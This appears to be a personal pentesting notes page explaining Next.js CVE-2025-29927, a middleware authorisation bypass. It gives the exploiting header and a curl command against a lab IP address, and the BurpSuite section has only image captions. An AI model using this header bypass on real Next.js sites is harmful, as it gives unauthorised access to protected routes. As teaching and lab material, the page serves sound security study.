Programmerboy Pentesting Stuff
  • Welcome
  • Web Pentesting Stuff
    • Pentesting Port 80,443
      • FFUF Commands
      • Virtual Host Scanning
      • Javascript DeObfuscation
      • Pentesting JWT (JSON Web Tokens)
      • Pentesting Graphql
      • Pentesting Redis 6379
  • CMS Pentesting
    • Wordpress Pentesting
    • Jenkins
    • Grafana
  • Network Penetration Testing
    • Nmap Commands
    • 53 - Pentesting DNS
    • 88 - Pentesting Kerberos
    • 111 - Pentesting RPC
    • 389 - Pentesting LDAP
    • 445 - Pentesting SMB
    • 873 - Pentesting Rsync
    • 1433 - Pentesting MSSQL
    • 2049 - Pentesting NFS
    • 3389 Pentesting RDP
    • 3306 - Pentesting Mysql
    • 5000 - Pentesting Docker Registry
  • Active Directory Pentesting
    • Methodology
  • Password and Bruteforce Attacks
    • Hydra
    • Cewl
    • Making Custom Wordlists (Usernames)
    • JSON to txt Wordlist
  • Linux Privilege Escalation
    • Getting a Fully Interactive TTY Shell
    • Docker Container Escape
  • Windows Privilege Escalation
    • Tunneling and Pivoting
    • Methodology
  • Bug Bounty
    • Bug Bounty Methodology
    • XSS
    • SQL Injection
    • Command Injection
    • File Upload Pentesting
    • Local and Remote File Inclusion
    • Broken Authentication
    • Server Side Request Forgery (SSRF)
    • XML External Entity (XXE)
    • Server Side Template Injection (SSTI)
    • ReconFTW (six2dez)
    • JS Files
    • SignUp Page
  • CTFs
    • WEB
    • Regex Bypass
    • Grep & Regex & Find strings
  • Python Programs for Pentesting
    • Python Code Snippets
  • Certifications-Notes
    • CRTO & Cobalt Strike
  • Phishing and Real World Stuff
    • Email Spoofing
    • Attacking Office 365 & Exchange
  • Cloud Pentesting
    • Enumeration
  • CVEs
    • Simplehelp CVE-2024-57727
    • Next.js CVE-2025-29927
Powered by GitBook
On this page
  • Exploitation using Curl
  • Exploitation using BurpSuite
  1. CVEs

Next.js CVE-2025-29927

PreviousSimplehelp CVE-2024-57727

Last updated 1 month ago

Next.js is a web development framework developed by Vercel to simplify the creation of high-performance web applications. Built on top of React, Next.js extends React’s capabilities by adding several features, such as static site generation (SSG) and server-side rendering (SSR). SSG pre-generates pages at build time, allowing faster delivery to users; moreover, SSR renders pages at request time, reducing load time. In brief, Next.js added features to improve performance and user experience.

CVE-2025-29927, a recent vulnerability discovered by Rachid and Yasser Allam in Next.js, revealed that it is possible to bypass authorisation checks if they occur in middleware. Middleware is the part that grants developers control over incoming requests. It acts as a bridge between the incoming request and the routing system. The routing system is file-based, i.e., routes are created and managed by organising files and directories. This vulnerability allows attackers to bypass middleware-based authorisation, and all versions before 14.2.25 and 15.2.3 are prone to this vulnerability.

Exploitation using Curl

We can exploit this CVE by using a Special Header

x-middleware-subrequest: middleware
curl -H "x-middleware-subrequest: middleware" http://10.10.207.214:3000/protected

Exploitation using BurpSuite

Without Header

With Header